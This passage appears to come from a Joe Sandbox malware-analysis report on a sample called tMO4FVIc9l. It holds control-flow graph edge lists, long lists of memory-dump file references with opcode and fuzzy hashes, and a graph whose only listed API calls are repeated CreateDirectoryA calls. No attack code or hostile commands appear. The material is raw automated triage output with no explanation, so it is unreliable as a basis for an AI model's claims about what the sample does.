5935 95f9d0-95f9d9 5906->5935 5936 95f9be-95f9c4 5906->5936 5921 95f9fc-95fa07 call 878660 5907->5921 5922 95fa75-95fa80 5909->5922 5928 95fa5e-95fa65 5910->5928 5913->5871 5920 95f66f-95f674 5913->5920 5916->5892 5920->5883 5929 95f676-95f679 5920->5929 5932 95fa0c-95fa10 5921->5932 5924 95fa84-95fa88 5922->5924 5933 95fa99-95fa9d 5924->5933 5934 95fa8a-95fa95 5924->5934 5925->5865 5927->5865 5937 95f8d7-95f8f0 call 96ac20 call 961710 5927->5937 5928->5883 5938 95fa6b 5928->5938 5930 95f683-95f693 5929->5930 5931 95f67b-95f67e 5929->5931 5940 95f6f5-95f6f9 5930->5940 5941 95f695-95f6a9 5930->5941 5939 95f71a-95f720 5931->5939 5932->5905 5942 95fa12-95fa18 5932->5942 5933->5888 5944 95fa9f-95faa7 5933->5944 5934->5924 5943 95fa97 5934->5943 5935->5921 5947 95f9db 5935->5947 5945 95f9c6-95f9c9 5936->5945 5946 95f9cb-95f9ce 5936->5946 5938->5922 5952 95f722 5939->5952 5953 95f728-95f72c 5939->5953 5949 95f6fd-95f705 call 878660 5940->5949 5965 95f6ce-95f6d8 5941->5965 5966 95f6ab-95f6b1 5941->5966 5942->5905 5943->5888 5950 95fabe-95facb call 963e60 5944->5950 5951 95faa9 5944->5951 5945->5892 5945->5946 5946->5892 5954 95f9e1-95f9e9 5947->5954 5955 95f9dd-95f9df 5947->5955 5967 95f70a-95f70e 5949->5967 5950->5888 5959 95fab0-95fabc 5951->5959 5952->5953 5961 95f785-95f7b5 5953->5961 5962 95f72e-95f735 5953->5962 5954->5921 5963 95f9eb 5954->5963 5955->5921 5955->5954 5959->5950 5959->5959 5980 95f7b7-95f7f6 call 96ac20 5961->5980 5981 95f7f8-95f7fb 5961->5981 5969 95f737 5962->5969 5970 95f739-95f74b 5962->5970 5971 95f9f1-95f9f6 5963->5971 5972 95f9ed-95f9ef 5963->5972 5965->5949 5978 95f6da 5965->5978 5974 95f6b3-95f6b6 5966->5974 5975 95f6b8 5966->5975 5967->5939 5976 95f710-95f716 5967->5976 5969->5970 5985 95f771-95f778 5970->5985 5986 95f74d-95f76e 5970->5986 5971->5932 5972->5921 5972->5971 5974->5885 5974->5975 5975->5885 5976->5939 5982 95f6e0-95f6e6 5978->5982 5983 95f6dc-95f6de 5978->5983 5980->5876 5981->5871 5987 95f7fd-95f7ff 5981->5987 5982->5949 5984 95f6e8 5982->5984 5983->5949 5983->5982 5988 95f6ee-95f6f3 5984->5988 5989 95f6ea-95f6ec 5984->5989 5985->5869 5990 95f77e-95f780 5985->5990 5986->5985 5987->5855 5988->5967 5989->5949 5989->5988 5990->5869
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0095F705
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0095FA07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID:
                                  • API String ID: 885266447-0
                                  • Opcode ID: 84a44f5be93bbcc380472708b98a6a312de6a90402175b368a8aab4e517f175c
                                  • Instruction ID: 580e8775be37cea219edd9b35b22875965901a0f0c33a3480d0c4d67952acd1e
                                  • Opcode Fuzzy Hash: 84a44f5be93bbcc380472708b98a6a312de6a90402175b368a8aab4e517f175c
                                  • Instruction Fuzzy Hash: C302B171604602AFDB14CF2AC460B6AB3E8BF88325F14867DE859C7650E774ED58CBD2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f9f2e3b6cd1d37bb33aa09dfae24fe2b3d77bdfea8a47ca04f7738a249d77d2
                                  • Instruction ID: be5f0bdbe050a2362a7e63a25fc73cb4b1acef3d02eaa48bf14650ca423c2e9e
                                  • Opcode Fuzzy Hash: 1f9f2e3b6cd1d37bb33aa09dfae24fe2b3d77bdfea8a47ca04f7738a249d77d2
                                  • Instruction Fuzzy Hash: 94E169B4D0466D8BDF15CF99D881AEEBBB5BF48300F00819AE859B7350D7385A82CF64
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08e4f426c9ac2d8944337f28f3515ae6e658ac8a8539df997edc4b7610015775
                                  • Instruction ID: 2a55cac486b6f95894076192081656f665f15587200985560c09d49b4ab216d4
                                  • Opcode Fuzzy Hash: 08e4f426c9ac2d8944337f28f3515ae6e658ac8a8539df997edc4b7610015775
                                  • Instruction Fuzzy Hash: 42A139B1A016069FDB14CF6AD54066AFBE5FF85314B29C16AE818DB311E732ED11CBC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 039bf6ba9971b05174fd4c3547f9119d32db7b29ffe7d09a53a2f2f3ced1783f
                                  • Instruction ID: 6bc3f4e01a12ce635277d06882c9c67a542c6d4c242f2693e275d9032d2b307a
                                  • Opcode Fuzzy Hash: 039bf6ba9971b05174fd4c3547f9119d32db7b29ffe7d09a53a2f2f3ced1783f
                                  • Instruction Fuzzy Hash: 0D81FDB1E44246DFEB118F68D8887AABBB4FF1A304F144169D868D7282CB34D909D7A1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1364 87e140-87e246 call 82b8e0 call 8332d0 call 83ab20 CreateDirectoryA 1371 87e8e1-87e8e8 1364->1371 1372 87e24c-87e250 1364->1372 1373 87e8ee-87e98a call 8332d0 call 83ab20 CreateDirectoryA 1371->1373 1374 87f16d-87f452 call 822df0 1371->1374 1375 87e252-87e26d 1372->1375 1391 87e990-87e994 1373->1391 1392 87f15e-87f168 call 822df0 1373->1392 1378 87e8a5-87e8d0 call 8363b0 call 8ff030 1375->1378 1379 87e273-87e3bd call 8363b0 * 4 call 8332d0 call 83ab20 call 83ad80 call 822df0 call 906ca0 1375->1379 1378->1371 1398 87e8d2-87e8d9 call 906770 1378->1398 1436 87e3bf-87e3d7 CreateDirectoryA 1379->1436 1437 87e3dd-87e4b0 call 8332d0 call 83ab20 call 83ad80 call 8362c0 call 822df0 * 2 call 906ca0 1379->1437 1395 87e996-87e9b1 1391->1395 1392->1374 1399 87e9b7-87eb07 call 8363b0 * 4 call 8332d0 call 83ab20 call 83ad80 call 822df0 call 906ca0 1395->1399 1400 87f11f-87f14d call 8363b0 call 8f7600 1395->1400 1406 87e8de 1398->1406 1453 87eb27-87ebfa call 8332d0 call 83ab20 call 83ad80 call 8362c0 call 822df0 * 2 call 906ca0 1399->1453 1454 87eb09-87eb21 CreateDirectoryA 1399->1454 1400->1392 1418 87f14f-87f156 call 906770 1400->1418 1406->1371 1424 87f15b 1418->1424 1424->1392 1436->1437 1439 87e854-87e8a0 call 822df0 * 5 1436->1439 1488 87e4b2-87e4ca CreateDirectoryA 1437->1488 1489 87e4d0-87e4d7 1437->1489 1439->1375 1513 87ebfc-87ec14 CreateDirectoryA 1453->1513 1514 87ec1a-87ec21 1453->1514 1454->1453 1457 87f0ce-87f11a call 822df0 * 5 1454->1457 1457->1395 1488->1439 1488->1489 1491 87e5e0-87e5e4 1489->1491 1492 87e4dd-87e59d call 8332d0 call 83ab20 call 83ad80 call 822df0 call 906ca0 1489->1492 1495 87e5e6-87e649 call 8332d0 1491->1495 1496 87e64e-87e652 1491->1496 1550 87e5c2-87e5cc call 836290 1492->1550 1551 87e59f-87e5c0 CreateDirectoryA 1492->1551 1510 87e704-87e7f2 call 822cf0 call 8332d0 call 83ab20 call 83ae20 call 8362c0 call 822df0 * 3 call 906ca0 1495->1510 1502 87e654-87e6b7 call 8332d0 1496->1502 1503 87e6b9-87e6ff call 8332d0 1496->1503 1502->1510 1503->1510 1601 87e7f4-87e80c CreateDirectoryA 1510->1601 1602 87e80e-87e84e call 8363b0 * 2 call 8fff00 1510->1602 1513->1457 1513->1514 1517 87ec27-87ece7 call 8332d0 call 83ab20 call 83ad80 call 822df0 call 906ca0 1514->1517 1518 87ed2a-87ed2e 1514->1518 1579 87ed0c-87ed16 call 836290 1517->1579 1580 87ece9-87ed0a CreateDirectoryA 1517->1580 1522 87ed34-87edce call 8332d0 call 83ab20 call 906ca0 1518->1522 1523 87ee43-87ee47 1518->1523 1567 87edf3-87ee31 call 8363b0 * 2 call 8fff00 1522->1567 1568 87edd0-87edf1 CreateDirectoryA 1522->1568 1528 87eeb1-87eeb5 1523->1528 1529 87ee49-87eeac call 8332d0 1523->1529 1537 87eeb7-87ef1a call 8332d0 1528->1537 1538 87ef1c-87ef7a call 8332d0 1528->1538 1547 87ef7f-87f04e call 822cf0 call 8332d0 call 83ab20 call 83ae20 call 822df0 * 2 call 906ca0 1529->1547 1537->1547 1538->1547 1608 87f073-87f0b9 call 8363b0 * 2 call 8fff00 1547->1608 1609 87f050-87f071 CreateDirectoryA 1547->1609 1557 87e5d1-87e5db call 822df0 1550->1557 1551->1550 1551->1557 1557->1491 1570 87ee34-87ee3e 1567->1570 1568->1567 1568->1570 1578 87f0c9 call 822df0 1570->1578 1578->1457 1585 87ed1b-87ed25 call 822df0 1579->1585 1580->1579 1580->1585 1585->1518 1601->1439 1601->1602 1602->1439 1619 87e850 1602->1619 1611 87f0bf-87f0c3 1608->1611 1622 87f0bb 1608->1622 1609->1608 1609->1611 1611->1578 1619->1439 1622->1611
                                  APIs
                                    • Part of subcall function 0082B8E0: CreateDirectoryA.KERNEL32(?,00000000), ref: 0082BA08
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0087E242
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,-0000004C), ref: 0087E3D3
                                  • CreateDirectoryA.KERNEL32(?,00000000,00000000,?,?,?,-0000004C), ref: 0087E4C6
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0087E5BC
                                  • CreateDirectoryA.KERNEL32(?,00000000,00000000), ref: 0087E808
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0087E986
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,-0000004C), ref: 0087EB1D
                                  • CreateDirectoryA.KERNEL32(?,00000000,00000000,?,?,?,-0000004C), ref: 0087EC10
